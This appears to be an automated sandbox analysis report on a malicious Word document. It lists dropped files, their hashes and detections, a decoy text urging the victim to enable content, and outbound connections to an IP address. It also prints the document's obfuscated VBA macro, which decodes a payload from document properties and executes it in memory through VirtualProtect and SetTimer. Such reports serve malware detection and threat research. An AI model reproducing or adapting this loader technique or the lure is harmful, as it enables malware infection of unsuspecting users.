                                                Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....nGU.39..........[..((.QPQD..)a...Z.m s..aHB...3........@....F.f......s..0&.}...{.^'.Vj.....U.V..].........8.-.g.."i.:c....>q..^Y.zm...2Zy...7e.,Kz"...t..@.;&....W.....3.._I...e...../.g......jy....^.D.W>P...?.-...t.1H...Z..|+#yj..*o.t.#c^9.<q.?A:C.....-.'...4.J...h.7BO^b.. ......^H...ytH}..3TT.J..Z...S..t.......6^F%.n..+.N.j..--.x.+OE[.W..@...V.. .-*./nQ.\.Z....A.^)..r0......-o.......@.......t^.P....<..-*O.....+O.3..k.....v.gH..^..ZP...q.1z...7..Uv..P..hIo.P..^>q(|5...=....{< .*...Z.<3.... ..!..Z.[.|.2...^Qy..F.D...5.h.eY..I..5.2zh..z..Hg...K..TZ..{.JO.h`..%.....Wz-.-....3$ZZ..hi.N....q...6...h...Y....1 ..........%....y.ZF:CE....5.uj.....+-Qi5.y4P.-r-.<c....vn..D..C....1.Hz.UIP.@.'.PPy.z.. ..*Q.-=..**O.+V...W.$O.-ZZ..Kgh....."e.._..=Tz....&OO.D..1.tPuLz.+=Qic<.Z.m.C.y.U....%..S.....Tz.g.E..[i..ec.W..jY.-j.<.1..mY....5N.<...2.KW. ...6...
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 61935
Entropy (8bit): 7.988218918927523
Encrypted: false
SSDEEP: 1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
MD5: 4800E90C87A78932178C7D338BA32F43
SHA1: 8006244EDAFF9A31546A17FCF99CB61DA4F69417
SHA-256: 8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
SHA-512: 58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
Malicious: false
Reputation: low
                                                Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.683375190196064
Encrypted: false
SSDEEP: 192:l1KtgbJDmX7JF93b2kDa5t66JDmX7JF93b2kDa:qtuJDmX1rL2kCtBJDmX1rL2k
MD5: B3FD623B10C21C4D9E09B7C2ED46EC94
SHA1: 5559EBDBE5EFA2168603E0D45027BE8D6B786DFD
SHA-256: 22CDFE14057F98D3DAA54DAE160CAACD13A102B9DDEDF9A125B677BA47A9106E
SHA-512: 2E71D038117B22F890E1372CBBE5E4FB4F80826CA9DD9A99EA0ED8CBC3DABC85AE6D0E5E9BA5500D43A6A4934C05EB3CA516DECBFBCCA8F6F291E6C3F4E4F9FA
Malicious: false
Reputation: low
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):2.1363686128594344
                                                Encrypted:false
                                                SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lI+kwkvdQ473W4wW4PllZWHkUZr8/W4c:4LG1ND9Pxn829k/Qq3W/WYbWHlJz
                                                MD5:FACB03470AEE19DAA10713FEC41483C1
                                                SHA1:A46E994A7888A44E3A580FF74E15001B3F502B86
                                                SHA-256:68FEED0A8607FD49B36FC442D519336DDD2FBCB229C4E7B2F221CD1A49F5662B
                                                SHA-512:9929AD4BA1CB5E7E898092390D8E4F12F23A072B85BD399C6EE40B1A9110BB3DA483299A6459264FDE4E1734E17ADA0AA921800BBF1F9BE351063DEFA922A64F
                                                Malicious:false
                                                Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):44544
                                                Entropy (8bit):6.056689486584974
                                                Encrypted:false
                                                SSDEEP:768:mD+ellQvZSazSRqbSEln5IyYpamDjobj8SpM:E+QWvZhSRqln5IUmDjoXV
                                                MD5:51138BEEA3E2C21EC44D0932C71762A8
                                                SHA1:8939CF35447B22DD2C6E6F443446ACC1BF986D58
                                                SHA-256:5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
                                                SHA-512:794F30FE452117FF2A26DC9D7086AAF82B639C2632AC2E381A81F5239CAAEC7C96922BA5D2D90BFD8D74F0A6CD4F79FBDA63E14C6B779E5CF6834C13E4E45E7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: feltenberger doc 08.11.doc, Detection: malicious
                                                • Filename: agsilverfile08.11.doc, Detection: malicious
                                                • Filename: ino.file.18.07.2022.doc, Detection: malicious
                                                • Filename: md-srl.doc.29.07.22.doc, Detection: malicious
                                                • Filename: [redacted]-document-26.07.22.doc, Detection: malicious
                                                • Filename: [redacted]-doc-26.07.doc, Detection: malicious
                                                • Filename: confinalp.file.26.07.22.doc, Detection: malicious
                                                • Filename: alhena-doc-26.07.2022.doc, Detection: malicious
                                                • Filename: andreademarchi invoice 26.07.22.doc, Detection: malicious
                                                • Filename: technographsri invoice 26.07.2022.doc, Detection: malicious
                                                • Filename: 377155250.doc, Detection: malicious
                                                • Filename: pelagagge_doc_22.07.22.doc, Detection: malicious
                                                • Filename: 12658371_dynamicom-invoice-18.07.22.doc, Detection: malicious
                                                • Filename: [redacted],file,18.07.doc, Detection: malicious
                                                • Filename: istitutomargherita.file.18.07.doc, Detection: malicious
                                                • Filename: gruppobluecity invoice 18.07.22.doc, Detection: malicious
                                                • Filename: bbdy_document_07.06.2022.doc, Detection: malicious
                                                • Filename: tcrc-central-le file 07.01.22.doc, Detection: malicious
                                                • Filename: ida,file,07.01.2022.doc, Detection: malicious
                                                • Filename: gol document 07.01.2022.doc, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V|.....,...,...,.eO,...,.eI,...,...,v..,.e^,...,.eY,...,.eN,...,.eK,...,Rich...,........PE..L...7.[J.................:...p...............P............................................@..................................@..x....`..`g......................P...<I..8...........................8&..@...p...l............@..@....................text....9.......:.................. ..`.data........P.......>..............@....rsrc...`g...`...h...B..............@..@.reloc..P...........................@..B..[J0.../.[J=...o.[JH.....[JS.....[J`...........KERNEL32.dll.USER32.dll.msvcrt.dll.imagehlp.dll.ntdll.dll...............................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):360448
                                                Entropy (8bit):4.669605444265748
                                                Encrypted:false
                                                SSDEEP:6144:4YCYa6MfAcSlE+S0fzAMJfWpKd5WhAl7CJDZ/PeHbUhHTmGPqG7s6FmlEHKiTd:/CwMfjSlE+A4eguRJDtPZIG46FkEH9
                                                MD5:18CC94DD7BBBFF54DF547A4F47346F01
                                                SHA1:B13786283F076A3E95BEDF277C4AD5CCF74D407E
                                                SHA-256:2FFB609277439F8D2F4E2716C54F282030BA717A59234098F364205BCF37FE9C
                                                SHA-512:798FB93688E812ED1AC854B9B4CF93E2A5BD5A3602CFED7F266B64526480A2102527C310513726800F6390D47E3F37444C0B4E90945B92EA73A6FA13328E5B67
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.4...Z...Z...Z...Y...Z.Y.Z...Z.3...Z.j.X...Z.Rich..Z.........................PE..d...Y..b.........." .....x................................................................`.............................................}............................................................................................................................text....w.......x.................. ..`.rdata..}............|..............@..@.rsrc................~..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):60416
                                                Entropy (8bit):4.172593521527024
                                                Encrypted:false
                                                SSDEEP:768:jKnjb0tZxwWKaJF/rMjJ1dXCE1lpBL/XrfdRcoOMGeyIye2PGEaI:jqWx7KaH4F1dXzhBLjGEyeEGEaI
                                                MD5:59993E0E46B1E754351F61C0175A071F
                                                SHA1:E2698FA83715D154E1EBFF7EF9468A3C13D56A5B
                                                SHA-256:9B895731F67A932C3D6B53DD7BE9A9551E014D31BF06B169C91EE35718D998B2
                                                SHA-512:197FDD99D32C0911CA01C81E1AB3D9754D47B9FFF0AEEE785EC158040DC0EEB90CAC42E807B40E34499B2D341DCD3F4EBB0CB1DDDF4B5F7EA37247AA42B17863
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...A...K...C...D...E...F...G...H...I...J...;...L...M...N...O...P...Q...R...S.......`...V...W...X...Y...Z...]...\.......i..._...........b...c...d...e...f...g...h...[...j...k...t...m...n...o...p...q...r...s...^...........................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Aug 11 23:27:16 2022, length=2203466, window=hide
                                                Category:dropped
                                                Size (bytes):1109
                                                Entropy (8bit):4.556591519488816
                                                Encrypted:false
                                                SSDEEP:12:8TVY0gXg/XAlCPCHaXNBQtB/SxXX+WYuY5imY4icvbCG9zl4HADtZ3YilMMEpxRR:8T2k/XT9SUnZbemG9pDv3qz4u7D
                                                MD5:7A9803AED26CBF0DC1D0074F4B0C32E7
                                                SHA1:C8BD62532D903BAB96D22533D94866DE0CEF2A6F
                                                SHA-256:F17C3AEE491E43CDCE86091040DFC9FDBB4674562B8CF04ADF4BAAFFF0526182
                                                SHA-512:AFF93121D72DA96AF5CB2B7F42A2CCB23762EF94C9519BBC6FCD58B30373F4B1BA50A7F438F3727057890BED590D5168BA2C078AE22FB7939F7678E8DFB3505D
                                                Malicious:false
                                                Preview:L..................F.... ...<r...3..<r...3..Us.F...J.!..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.J.!..Ui. .DODSON~1.DOC..p......hT..hT..*...r.....'...............d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\210979\Users.user\Desktop\dodsonimaging,file,08.11.2022.doc.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.d.s.o.n.i.m.a.g.i.n.g.,.f.i.l.e.,.0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):109
                                                Entropy (8bit):4.718136592074459
                                                Encrypted:false
                                                SSDEEP:3:bDuMJlZIMg9omX18g+Mg9ov:bCSxg9E2g9y
                                                MD5:E28869B9DCA55802DD912623F282F342
                                                SHA1:A79867AEBA6C3B64392ECE7EEA2A48E6F4988430
                                                SHA-256:EFAFE8B739A6D1A7DF19C01FBE30850246F58DC935DF400AA24EA7BEB62EC869
                                                SHA-512:0B360FECB904D52BD1B0EE6164A673190FF27E7761D369AC1E716955270F88CCD560B55A4BDB8B6EDD064B725E2DC5CC9AF9FB354D3F9CE0CFB2A3FCB263FBDA
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..dodsonimaging,file,08.11.2022.LNK=0..[doc]..dodsonimaging,file,08.11.2022.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                File type:Zip archive data, at least v2.0 to extract
                                                Entropy (8bit):7.99341108201784
                                                TrID:
                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                • ZIP compressed archive (8000/1) 7.92%
                                                File name:dodsonimaging,file,08.11.2022.doc
                                                File size:2298458
                                                MD5:db11828aed458eccfab30c367bc1bb2f
                                                SHA1:3487931f130485c82d21e9ef4155af0a8fd46c33
                                                SHA256:d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
                                                SHA512:912a9d23b444a26ee176777d5be88c6a58a3cbf85864d3e09a3a497bcd3858764f8a9b318ddb8c314eb5e521a6a59ebcf88842cd3d7f9ed6f87ab7d192a12513
                                                SSDEEP:49152:RZQvsaxwME576XnfwHM3SSx+LwC01/BvObZ4Yf/KUoDG1J7:SxwfeXsGQwC4wByh25
                                                TLSH:CFB533442D61A68BE52F6234C6462265F4DD4AB303ACFDAE117DCF7E8359D36B0B01E8
                                                File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
                                                Icon Hash:e4eea2aaa4b4b4a4
                                                Document Type:OpenXML
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:
                                                Encrypted Document:False
                                                Contains Word Document Stream:True
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:True
                                                General
                                                Stream Path:VBA/ThisDocument
                                                VBA File Name:ThisDocument.cls
                                                Stream Size:2874
                                                Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n q . . . . . . . L i b " u s e . r 3 2 " A l i . a s " K i l l . T i m e r " ( B y V a l . . . ! . . . . A s L o n g . 3 , . . % . . .
                                                Data Raw:01 b0 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                Attribute VB_Name = "ThisDocument"
                                                Attribute VB_Base = "1Normal.ThisDocument"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = True
                                                Attribute VB_Customizable = True
                                                Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
                                                Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
                                                Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
                                                Function (, Optional  = False)
                                                    If  Then
                                                        Set  = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
                                                    Else
                                                        Set  = ((), )
                                                    End If
                                                    Set  = 
                                                    End Function
                                                Function ()
                                                     = 8
                                                    End Function
                                                Function ()
                                                     = 0
                                                    End Function
                                                Private Sub Document_Open()
                                                    Dim () As Byte
                                                    If () Then
                                                         = ((laMT7W1FQ9("Dbl_z8FQA")).Value)
                                                    Else
                                                         = ((laMT7W1FQ9("S69tN3D")).Value)
                                                    End If
                                                    Dim  As LongPtr
                                                    Dim  As LongPtr
                                                    Dim  As LongPtr
                                                    Dim  As LongPtr
                                                     = () + 1
                                                     = VarPtr((0))
                                                     , , 64, VarPtr()
                                                            ()(laMT7W1FQ9("WbohhHuqGZ")) = laMT7W1FQ9("ncJln8aIych")
                                                         = (0, , 1, )
                                                     1
                                                     0, 
                                                    ().Remove (laMT7W1FQ9("Szjwykb2"))
                                                    ().Remove (laMT7W1FQ9("rqOurs0Au"))
                                                    ReDim (1)
                                                End Sub
                                                Function (, )
                                                     = Mid(,  + 1, 1)
                                                End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                         = Len()
                                                    Else
                                                         = ((), )
                                                    End If
                                                     = 
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                         = CDec()
                                                    Else
                                                         = ((), )
                                                    End If
                                                     = 
                                                    End Function
                                                Function ()
                                                     = 5
                                                    End Function
                                                Function ()
                                                     = 2
                                                    End Function
                                                Function (, , Optional  = False)
                                                    If  Then
                                                         = Mid(,  + 1, 1)
                                                    Else
                                                         = ((), , )
                                                    End If
                                                     = 
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                         = ()
                                                    Else
                                                         = ((), )
                                                    End If
                                                     = 
                                                    End Function
                                                Public Function laMT7W1FQ9(strInput)
                                                        laMT7W1FQ9 = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
                                                    End Function
                                                Function ()
                                                     = 10
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                         = UBound()
                                                    Else
                                                         = ((), )
                                                    End If
                                                     = 
                                                    End Function
                                                Function ()
                                                     = 4
                                                    End Function
                                                Function ()
                                                     = 3
                                                    End Function
                                                Function ()
                                                     = 1
                                                    End Function
                                                Function ()
                                                     = 11
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                         = VarPtr()
                                                    Else
                                                         = ((), )
                                                    End If
                                                     = 
                                                    End Function
                                                Function ()
                                                    ReDim (() - 1) As Byte
                                                    Dim  As Long,  As Long
                                                    Dim :  = laMT7W1FQ9("aDCvPYmsAe") & laMT7W1FQ9("CorCfK97l")
                                                    For  = 0 To () - 1 Step 2
                                                         =  / 2
                                                        () = 255 - ( & (, ) & (,  + 1))
                                                    Next
                                                     = 
                                                End Function
                                                Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
                                                    Select Case 
                                                            Case ()
                                                                Set  = (, True)
                                                            Case ()
                                                                Set  = (, True)
                                                            Case ()
                                                                Set  = (True)
                                                            Case ()
                                                                Set  = (True)
                                                            Case ()
                                                                Set  = (, True)
                                                            Case ()
                                                                 = (, True)
                                                            Case ()
                                                                 = (, True)
                                                            Case ()
                                                                 = (, True)
                                                            Case ()
                                                                 = (, True)
                                                            Case ()
                                                                 = (, , True)
                                                            Case ()
                                                                 = (True)
                                                            Case ()
                                                                 = (, True)
                                                        End Select
                                                End Function
                                                Function (Optional  = False)
                                                    If  Then
                                                        Set  = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
                                                    Else
                                                        Set  = (())
                                                    End If
                                                    Set  = 
                                                    End Function
                                                Function ()
                                                     = 6
                                                    End Function
                                                Sub (w)
                                                    Dim  As Long
                                                    Dim  As Long
                                                     = () + ()
                                                    Do
                                                         = ()
                                                        DoEvents
                                                    Loop Until  > 
                                                End Sub
                                                Function ()
                                                    #If Win64 Then
                                                         = True
                                                    #Else
                                                         = False
                                                    #End If
                                                End Function
                                                Function (Optional  = False)
                                                    If  Then
                                                         = Timer()
                                                    Else
                                                         = (())
                                                    End If
                                                     = 
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                        Set  = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
                                                    Else
                                                        Set  = ((), )
                                                    End If
                                                    Set  = 
                                                    End Function
                                                Function ()
                                                     = 9
                                                    End Function
                                                Function (, Optional  = False)
                                                    If  Then
                                                        Set  = GetObject()
                                                    Else
                                                        Set  = ((), )
                                                    End If
                                                    Set  = 
                                                    End Function
                                                Function (Optional  = False)
                                                    If  Then
                                                        Set  = ActiveDocument
                                                    Else
                                                        Set  = (())
                                                    End If
                                                    Set  = 
                                                    End Function
                                                Function ()
                                                     = 7
                                                    End Function
                                                

                                                General
                                                Stream Path:PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:357
                                                Entropy:5.294641930282945
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 4 E 2 6 9 6 0 2 - 6 6 5 D - 4 2 2 2 - B 7 8 C - 9 7 E 2 A 8 5 B 8 E C B } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 8 A A 7 2 8 0 7 6 8 0 7 6 8 0 7 6 8 0 7 6 " . . D P B = " 5 0 5 2 8 A 2 D 8 B 2 D 8 B 2 D " . . G C = " F 8 F A 2 2 D 5 2 3 D 5 2 3 2 A " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
                                                General
                                                Stream Path:PROJECTwm
                                                File Type:data
                                                Stream Size:41
                                                Entropy:3.0773844850752607
                                                Base64 Encoded:False
                                                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                General
                                                Stream Path:VBA/_VBA_PROJECT
                                                File Type:ISO-8859 text, with no line terminators
                                                Stream Size:7
                                                Entropy:1.8423709931771088
                                                Base64 Encoded:False
                                                Data ASCII:a . . .
                                                General
                                                Stream Path:VBA/__SRP_2
                                                File Type:data
                                                Stream Size:5116
                                                Entropy:1.9333763372676134
                                                Base64 Encoded:False
                                                General
                                                Stream Path:VBA/__SRP_3
                                                File Type:data
                                                Stream Size:2724
                                                Entropy:2.697647710097881
                                                Base64 Encoded:False
                                                General
                                                Stream Path:VBA/dir
                                                File Type:data
                                                Stream Size:486
                                                Entropy:6.299483290874555
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . N G d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . L m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
                                                 Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                                 Aug 11, 2022 17:27:53.037703037 CEST  49171        80         192.168.2.22   45.8.146.139
                                                 Aug 11, 2022 17:27:53.141216040 CEST  80           49171      45.8.146.139   192.168.2.22
                                                 Aug 11, 2022 17:27:53.141383886 CEST  49171        80         192.168.2.22   45.8.146.139
